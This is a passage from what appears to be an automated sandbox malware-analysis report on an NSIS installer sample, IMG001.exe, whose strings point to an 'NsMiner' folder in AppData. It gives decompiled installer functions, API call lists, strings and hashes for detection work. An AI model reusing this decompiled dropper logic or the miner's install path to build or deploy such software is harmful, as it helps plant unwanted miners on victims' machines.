							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x7c56a0;
						 *0x7c1654 = _t28;
						_v20 = 0x624e5f;
						 *0x7c1644 = 0x401000;
						 *0x7c1650 =  *0x7c56a0;
						 *0x7c1664 =  &_v20;
						if(RegisterClassA(0x7c1640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x7b0488 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7c56a0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x7bd640;
					E004058D7( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7c56d8, 0x7bd640, 0);
					_t62 =  *0x7bd640; // 0x6f
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x7bd641;
						 *((char*)(E0040550E(0x7bd641, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059F0(0x7f0000, E004054E3(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E0040552A(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040353f
0x00403548
0x0040354f
0x00403551
0x00403565
0x00403577
0x00403581
0x00403586
0x0040358c
0x0040359f
0x0040359f
0x004035aa
0x00403553
0x00403553
0x0040355e
0x0040355e
0x004035af
0x004035c2
0x004035c7
0x004035d8
0x0040365f
0x00403667
0x00403670
0x00403670
0x00403686
0x0040368c
0x0040369a
0x00403729
0x00403731
0x0040373b
0x00403740
0x00403746
0x004037d0
0x004037d5
0x004037d7
0x004037f3
0x00000000
0x004037f3
0x004037d9
0x004037df
0x004037e7
0x004037e7
0x00000000
0x004037df
0x00403754
0x00403765
0x00403767
0x00403769
0x00403770
0x00403770
0x00403778
0x00403780
0x00403782
0x00403784
0x0040378d
0x00403790
0x00403796
0x00403796
0x004037b5
0x004037c6
0x00000000
0x004037cb
0x00403733
0x00403735
0x00000000
0x004036a0
0x004036a0
0x004036a6
0x004036b0
0x004036b8
0x004036c2
0x004036c8
0x004036d6
0x004037f8
0x004037f8
0x00000000
0x004037f8
0x004036dc
0x004036e5
0x00403724
0x00000000
0x00403724
0x004035de
0x004035de
0x004035e3
0x00000000
0x00000000
0x004035ed
0x004035fd
0x00403602
0x00403609
0x00000000
0x00000000
0x0040360d
0x0040360f
0x0040361c
0x0040361c
0x00403624
0x0040362a
0x00403652
0x0040365a
0x00000000
0x0040363c
0x0040363d
0x00403646
0x0040364c
0x0040364d
0x00000000
0x0040364d
0x00403648
0x0040364a
0x00000000
0x00000000
0x00000000
0x0040364a
0x0040362a

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

GetUserDefaultUILanguage.KERNELBASE(00000006,007EE000,00000000,007F8000,00000000), ref: 00403553

Part of subcall function 0040594E: wsprintfA.USER32 ref: 0040595B

lstrcatA.KERNEL32(007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000,00000000,007F8000,00000000), ref: 004035AA
lstrlenA.KERNEL32(open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,?,?,?,open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000), ref: 0040361F
lstrcmpiA.KERNEL32(?,.exe,open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,?,?,?,open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000), ref: 00403632
GetFileAttributesA.KERNEL32(open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe), ref: 0040363D
LoadImageA.USER32 ref: 00403686
RegisterClassA.USER32 ref: 004036CD
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E5
CreateWindowExA.USER32 ref: 0040371E
ShowWindow.USER32(00000005,00000000), ref: 00403754
LoadLibraryA.KERNEL32(RichEd20), ref: 00403765
LoadLibraryA.KERNEL32(RichEd32), ref: 00403770
GetClassInfoA.USER32 ref: 00403780
GetClassInfoA.USER32 ref: 0040378D
RegisterClassA.USER32 ref: 00403796
DialogBoxParamA.USER32 ref: 004037B5

Strings

.DEFAULT\Control Panel\International, xrefs: 00403595
Control Panel\Desktop\ResourceLocale, xrefs: 0040356D
RichEd32, xrefs: 0040376B
open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe, xrefs: 004035ED, 004035F5, 00403602, 0040364C, 00403652
RichEdit20A, xrefs: 00403778, 0040377E
RichEd20, xrefs: 00403760
_Nb, xrefs: 004036DC, 004036E1
RichEdit, xrefs: 00403787
.exe, xrefs: 0040362C

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe
API String ID: 2262724009-364309958
Opcode ID: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction ID: 8c621e14f72e88bd80986ac3a21b0b3abaff23a62075e42d3877170e53afbe30
Opcode Fuzzy Hash: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction Fuzzy Hash: DC61C1B0500240BED220AF619C85F273BADEB41759F44853EF941B62E2DB7DAD408B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00405A12, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00405A12(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x7c167c - 4 + _t36 * 4);
				}
				_t74 =  *0x7c56d8 + _t36;
				_t37 = 0x7bd640;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x7bd640;
				if(_a4 - 0x7bd640 < 0x4000) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x2000;
					if(_t86 - _t37 >= 0x2000) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405A12(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x7bd640;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xd) + 0x7c6000;
							E004059F0(_t86, (_t95 << 0xd) + 0x7c6000);
						} else {
							E0040594E(_t86,  *0x7c56a8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C52(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x7c5724;
						if( *0x7c5724 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x2000);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x7c56a4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86); // executed
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x2000);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x7c56d8;
							E004058D7(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7c56d8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405A12(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059F0(_a4, _t37);
			}

APIs

GetVersion.KERNEL32(?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405ABA
GetSystemDirectoryA.KERNEL32 ref: 00405B35
GetWindowsDirectoryA.KERNEL32(open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,00002000), ref: 00405B48
SHGetSpecialFolderLocation.SHELL32(?,0079D058), ref: 00405B84
SHGetPathFromIDListA.SHELL32(0079D058,open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe), ref: 00405B92
CoTaskMemFree.OLE32(0079D058), ref: 00405B9D
lstrcatA.KERNEL32(open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BBF
lstrlenA.KERNEL32(open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe,?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405C11

Strings

open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe, xrefs: 00405A3B, 00405B02, 00405B1F, 00405B34, 00405B47, 00405B63, 00405B8E, 00405BBE, 00405BC4, 00405BDC, 00405BEF, 00405C0A, 00405C10, 00405C1B, 00405C45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B04
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BB9

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Windows\system32\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe
API String ID: 900638850-3314903778
Opcode ID: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction ID: c6751bb8eccc804ec61c49aead727a37010080e613970cf4b87633533313e554
Opcode Fuzzy Hash: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction Fuzzy Hash: 2351D231A04A04ABEF206B249C84B7F3BB4DB55724F14423BE511BA2D1D37D6981DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7c56ac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x7fc000, 0x2000);
				_t89 = E004056C7(0x7fc000, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E004059F0(0x7f4000, 0x7fc000);
				E004059F0(0x7fe000, E0040552A(0x7f4000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7a6460 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					__eflags =  *0x7c56b4 - _t82;
					if( *0x7c56b4 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403093( *0x7c56b4 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E5B();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7c56b0 = _t94;
							 *0x7c56b8 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7c56bc =  *0x7c56bc + 1;
								__eflags =  *0x7c56bc;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405688(0x7c56c0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403093( *0x792454);
					_t65 = E00403061( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7c56b4) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403061(0x79e460, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7c56b4;
						if( *0x7c56b4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405688( &_v44, 0x79e460, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x792454; // 0x363211
						 *0x7c5740 =  *0x7c5740 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7c56b4 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40915c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7a6460; // 0x363215
						if(__eflags < 0) {
							_v12 = E00405D7E(_v12, 0x79e460, _t90);
						}
						 *0x792454 =  *0x792454 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,007FC000,00002000), ref: 00402C4F

Part of subcall function 004056C7: GetFileAttributesA.KERNELBASE(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
Part of subcall function 004056C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

GetFileSize.KERNEL32(00000000,00000000,007FE000,00000000,007F4000,007F4000,007FC000,007FC000,80000000,00000003), ref: 00402C9B

Strings

soft, xrefs: 00402D10
Inst, xrefs: 00402D07
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
Error launching installer, xrefs: 00402C72
`y, xrefs: 00402CB0
Null, xrefs: 00402D19

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`y$soft
API String ID: 4283519449-3997830375
Opcode ID: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction ID: 57f23f0b62e6a01369d39fff8d31ed78eb59a747729ce522ddeed5f5d9bac812
Opcode Fuzzy Hash: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction Fuzzy Hash: 65513671900604ABDB109F64DE89F9E7BA8EF04719F50413BF901B62D1D7BC9D818B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				int _t73;
				long _t74;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t98;
				void* _t99;
				long _t100;
				int _t101;
				long _t102;
				int _t103;
				intOrPtr _t104;
				long _t105;
				void* _t106;

				_t101 = _a16;
				_t98 = _a12;
				_v12 = _t101;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x796458;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E00403093( *0x7c56f8 + _t65);
				}
				_t67 = E00403061( &_a16, 4); // executed
				if(_t67 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 != 0) {
							if(_a16 < _t101) {
								_t101 = _a16;
							}
							if(E00403061(_t98, _t101) != 0) {
								_v8 = _t101;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t102 = _v12;
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E00403061(0x792458, _t102) == 0) {
								goto L44;
							}
							_t73 = WriteFile(_a8, 0x792458, _t102,  &_a12, 0); // executed
							if(_t73 == 0 || _t102 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t68);
								return _t68;
							} else {
								_v8 = _v8 + _t102;
								_a16 = _a16 - _t102;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t74 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x413ba0 = 0xb;
					 *0x413bb8 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t103 = 0x4000;
						if(_a16 < 0x4000) {
							_t103 = _a16;
						}
						if(E00403061(0x792458, _t103) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t103;
						 *0x413b90 = 0x792458;
						 *0x413b94 = _t103;
						while(1) {
							_t99 = _v16;
							 *0x413b98 = _t99;
							 *0x413b9c = _v12;
							_t78 = E00405DEC("/Fy");
							_v28 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t104 =  *0x413b98; // 0x79d058
							_t105 = _t104 - _t99;
							_t79 = GetTickCount();
							_t100 = _t79;
							if(( *0x7c5754 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t106 = _t106 + 0xc;
								E00404D8E(0,  &_v92);
								_v20 = _t100;
							}
							if(_t105 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x413b98; // 0x79d058
									_v8 = _v8 + _t105;
									_v12 = _v12 - _t105;
									_v16 = _t81;
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t83 = WriteFile(_a8, _v16, _t105,  &_v24, 0); // executed
								if(_t83 == 0 || _v24 != _t105) {
									goto L30;
								} else {
									_v8 = _v8 + _t105;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402EBD
GetTickCount.KERNEL32 ref: 00402F44
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F71
wsprintfA.USER32 ref: 00402F81
WriteFile.KERNELBASE(00000000,00000000,0079D058,7FFFFFFF,00000000), ref: 00402FAF

Strings

... %d%%, xrefs: 00402F7B
Xdy, xrefs: 00402E84
X$y, xrefs: 00402FF9
/Fy, xrefs: 00402F0A, 00402F1C
X$y, xrefs: 00402EE6

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
